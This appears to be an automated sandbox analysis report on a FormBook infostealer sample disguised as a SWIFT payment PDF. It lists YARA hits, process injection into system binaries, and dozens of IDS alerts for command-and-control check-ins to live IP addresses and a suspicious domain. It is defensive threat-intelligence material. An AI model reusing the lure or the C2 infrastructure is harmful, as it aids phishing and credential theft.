Windows Analysis Report
Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe

Machine Learning detection for sample

Source: Yara match	File source: 2.2.svchost.exe.520000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.svchost.exe.520000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.5958070475.00000000014A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1441626408.0000000000520000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1442932990.0000000003550000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.5054439385.0000000004310000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.5054354866.00000000042C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1443008474.00000000035A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.5958733126.0000000002A80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Source: Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe

Joe Sandbox ML: detected

Source: Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: nmlZZxePqIALDF.exe, 0000000B.00000000.1368079590.0000000000B3E000.00000002.00000001.01000000.00000007.sdmp, nmlZZxePqIALDF.exe, 0000000D.00000000.1511410992.0000000000B3E000.00000002.00000001.01000000.00000007.sdmp
Source:	Binary string: wntdll.pdbUGP source: Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000003.906520048.0000000004560000.00000004.00001000.00020000.00000000.sdmp, Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000003.905073808.0000000004370000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1442164263.0000000003200000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1354730336.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1352046596.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1442164263.000000000332D000.00000040.00001000.00020000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000002.5054689691.000000000464D000.00000040.00001000.00020000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000003.1445676504.00000000041CF000.00000004.00000020.00020000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000002.5054689691.0000000004520000.00000040.00001000.00020000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000003.1448512086.0000000004378000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000003.906520048.0000000004560000.00000004.00001000.00020000.00000000.sdmp, Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe, 00000000.00000003.905073808.0000000004370000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.1442164263.0000000003200000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1354730336.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1352046596.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1442164263.000000000332D000.00000040.00001000.00020000.00000000.sdmp, DevicePairingWizard.exe, DevicePairingWizard.exe, 0000000C.00000002.5054689691.000000000464D000.00000040.00001000.00020000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000003.1445676504.00000000041CF000.00000004.00000020.00020000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000002.5054689691.0000000004520000.00000040.00001000.00020000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000003.1448512086.0000000004378000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: DevicePairingWizard.pdb source: svchost.exe, 00000002.00000003.1410633669.0000000000A1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1410879115.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp, nmlZZxePqIALDF.exe, 0000000B.00000003.4818771537.0000000000EEB000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: svchost.pdb source: DevicePairingWizard.exe, 0000000C.00000002.5055513570.0000000004B4C000.00000004.10000000.00040000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000002.5053346838.000000000080C000.00000004.00000020.00020000.00000000.sdmp, nmlZZxePqIALDF.exe, 0000000D.00000002.5959819188.00000000034AC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.1733921214.000000002529C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: svchost.pdbUGP source: DevicePairingWizard.exe, 0000000C.00000002.5055513570.0000000004B4C000.00000004.10000000.00040000.00000000.sdmp, DevicePairingWizard.exe, 0000000C.00000002.5053346838.000000000080C000.00000004.00000020.00020000.00000000.sdmp, nmlZZxePqIALDF.exe, 0000000D.00000002.5959819188.00000000034AC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000E.00000002.1733921214.000000002529C000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: DevicePairingWizard.pdbGCTL source: svchost.exe, 00000002.00000003.1410633669.0000000000A1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1410879115.0000000000A2E000.00000004.00000020.00020000.00000000.sdmp, nmlZZxePqIALDF.exe, 0000000B.00000003.4818771537.0000000000EEB000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 0_2_004339B6 GetFileAttributesW,FindFirstFileW,FindClose,	0_2_004339B6
Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 0_2_00452492 FindFirstFileW,Sleep,FindNextFileW,FindClose,	0_2_00452492
Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 0_2_00442886 FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00442886
Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 0_2_004788BD FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,	0_2_004788BD
Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 0_2_0045CAFA FindFirstFileW,FindNextFileW,FindClose,	0_2_0045CAFA
Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 0_2_00431A86 FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00431A86
Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 0_2_0044BD27 FindFirstFileW,CopyFileW,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose,	0_2_0044BD27
Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 0_2_0045DE8F FindFirstFileW,FindClose,	0_2_0045DE8F
Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Code function: 0_2_0044BF8B FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_0044BF8B

Source: C:\Windows\SysWOW64\DevicePairingWizard.exe

Code function: 4x nop then mov ebx, 00000004h

12_2_044104E8

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49771 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49724 -> 154.38.64.6:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49745 -> 173.255.194.134:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49721 -> 47.52.221.8:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49738 -> 203.161.49.193:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49735 -> 208.91.197.27:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49720 -> 47.52.221.8:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49722 -> 47.52.221.8:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49719 -> 206.119.81.121:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49755 -> 84.32.84.32:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49725 -> 154.38.64.6:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49740 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49723 -> 47.52.221.8:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49747 -> 173.255.194.134:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49736 -> 203.161.49.193:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49726 -> 154.38.64.6:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49780 -> 206.119.81.121:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49744 -> 173.255.194.134:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49749 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49759 -> 108.179.252.152:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49786 -> 154.38.64.6:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49767 -> 199.59.243.227:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49737 -> 203.161.49.193:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49776 -> 199.59.243.227:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49750 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49760 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49741 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49757 -> 108.179.252.152:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49788 -> 154.38.64.6:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49763 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49782 -> 47.52.221.8:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49743 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49748 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49765 -> 199.59.243.227:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49783 -> 47.52.221.8:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49781 -> 47.52.221.8:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49727 -> 154.38.64.6:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49806 -> 173.255.194.134:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49769 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49784 -> 47.52.221.8:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49796 -> 208.91.197.27:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49778 -> 199.59.243.227:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49761 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49811 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49731 -> 84.32.84.32:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49779 -> 199.59.243.227:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49746 -> 173.255.194.134:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49758 -> 108.179.252.152:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49739 -> 203.161.49.193:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49772 -> 199.59.243.227:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49802 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49777 -> 199.59.243.227:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49809 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49787 -> 154.38.64.6:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49797 -> 203.161.49.193:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49799 -> 203.161.49.193:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49805 -> 173.255.194.134:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49774 -> 199.59.243.227:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49801 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49798 -> 203.161.49.193:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49766 -> 199.59.243.227:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49785 -> 154.38.64.6:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49792 -> 84.32.84.32:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49751 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49808 -> 173.255.194.134:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49812 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49768 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49810 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49756 -> 108.179.252.152:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49804 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49773 -> 199.59.243.227:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49764 -> 199.59.243.227:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49775 -> 199.59.243.227:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49807 -> 173.255.194.134:80
Source: Network traffic	Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.11.20:49800 -> 203.161.49.193:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49789 -> 84.32.84.32:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49732 -> 208.91.197.27:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49728 -> 84.32.84.32:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49733 -> 208.91.197.27:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49752 -> 84.32.84.32:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49730 -> 84.32.84.32:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49734 -> 208.91.197.27:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49791 -> 84.32.84.32:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49793 -> 208.91.197.27:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49754 -> 84.32.84.32:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49753 -> 84.32.84.32:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49762 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49790 -> 84.32.84.32:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49729 -> 84.32.84.32:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49803 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49770 -> 3.33.130.190:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49742 -> 13.248.169.48:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49795 -> 208.91.197.27:80
Source: Network traffic	Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49794 -> 208.91.197.27:80

Performs DNS queries to domains with low reputation

Source:

DNS query: www.makerpay.xyz

Source: Joe Sandbox View

IP Address: 13.248.169.48 13.248.169.48

Source: Joe Sandbox View	ASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC
Source: Joe Sandbox View	ASN Name: COGENT-174US COGENT-174US
Source: Joe Sandbox View	ASN Name: AMAZON-02US AMAZON-02US
Source: Joe Sandbox View	ASN Name: COGENT-174US COGENT-174US

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 9.9.9.9
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\Swift MT1O3 Payment Notification Scan Copy Ref 62587299-24_PDF.exe

Code function: 0_2_004422FE InternetQueryDataAvailable,InternetReadFile,

0_2_004422FE

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 12 Nov 2024 14:30:21 GMTContent-Type: text/html; charset=utf-8Content-Length: 337Connection: closeContent-Encoding: gzipVary: Accept-EncodingData Raw: 1f 8b 08 00 00 00 00 00 00 ff 8c 92 31 6f f2 30 10 86 77 7e 85 f1 a7 6f 4b e2 b0 55 21 8e 54 51 3a 21 d1 81 0e 9d 2a 27 be 12 a3 d8 0e ce 85 10 55 fd ef 15 c1 50 40 ad 44 32 e4 de bb dc fb f8 6c a7 e3 a7 e5 6c f5 f6 32 27 25 ea 2a 1b a5 a7 0f 08 99 8d 08 21 24 6d 0a a7 6a 24 8d 2b 38 65 ac 2a a3 d8 5e bd e7 20 2a ac 66 9b 6d 0b ae 8f 36 0d cd 52 76 6c bd f6 29 4a e1 1a 40 4e 5f 57 cf e1 03 25 4a 72 ba 78 7c 9f 2d 17 8b f9 6c 45 ef e5 6c 5b 29 ec e4 37 ce 38 0c 3d 0a fb 1a 38 45 d8 23 db 88 9d 38 66 ef 26 d4 f2 ca 3d 0c bd bf 06 14 b7 53 5c 96 0e 03 ed 14 74 b5 75 48 89 11 1a 2e 75 61 0d 82 41 4e 3b 25 b1 e4 12 76 aa 80 70 10 81 56 46 e9 56 87 4d 21 2a e0 93 28 0e b4 d8 df 64 da 06 dc 20 45 5e 01 37 f6 84 46 85 15 64 1d e4 8d 42 48 d9 51 fa 8d c7 fe 14 1f 9e c3 09 07 b9 95 7d a0 3e 9c d0 f0 39 c0 13 32 89 e3 ff d3 12 d4 ba 44 2f 6a 21 a5 32 eb 84 c4 53 2d dc 5a 99 84 c4 5f 67 9f 7f 9d 13 f5 df cd 3f 3f 7a 4c 6e 9d 04 97 10 63 0d f8 6a ca fc da 52 36 5c b8 ef 00 00 00 ff ff 78 7c 24 01 8e 02 00 00 Data Ascii: 1o0w~oKU!TQ:!'UP@D2ll2'%!$mj$+8e^ fm6Rvl)J@N_W%Jrx\|-lEl[)78=8E#8f&=S\tuH.uaAN;%vpVFVM!*(d E^7FdBHQ}>92D/j!2S-Z_g??zLncjR6\x\|$
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 12 Nov 2024 14:30:24 GMTContent-Type: text/html; charset=utf-8Content-Length: 337Connection: closeContent-Encoding: gzipVary: Accept-EncodingData Raw: 1f 8b 08 00 00 00 00 00 00 ff 8c 92 31 6f f2 30 10 86 77 7e 85 f1 a7 6f 4b e2 b0 55 21 8e 54 51 3a 21 d1 81 0e 9d 2a 27 be 12 a3 d8 0e ce 85 10 55 fd ef 15 c1 50 40 ad 44 32 e4 de bb dc fb f8 6c a7 e3 a7 e5 6c f5 f6 32 27 25 ea 2a 1b a5 a7 0f 08 99 8d 08 21 24 6d 0a a7 6a 24 8d 2b 38 65 ac 2a a3 d8 5e bd e7 20 2a ac 66 9b 6d 0b ae 8f 36 0d cd 52 76 6c bd f6 29 4a e1 1a 40 4e 5f 57 cf e1 03 25 4a 72 ba 78 7c 9f 2d 17 8b f9 6c 45 ef e5 6c 5b 29 ec e4 37 ce 38 0c 3d 0a fb 1a 38 45 d8 23 db 88 9d 38 66 ef 26 d4 f2 ca 3d 0c bd bf 06 14 b7 53 5c 96 0e 03 ed 14 74 b5 75 48 89 11 1a 2e 75 61 0d 82 41 4e 3b 25 b1 e4 12 76 aa 80 70 10 81 56 46 e9 56 87 4d 21 2a e0 93 28 0e b4 d8 df 64 da 06 dc 20 45 5e 01 37 f6 84 46 85 15 64 1d e4 8d 42 48 d9 51 fa 8d c7 fe 14 1f 9e c3 09 07 b9 95 7d a0 3e 9c d0 f0 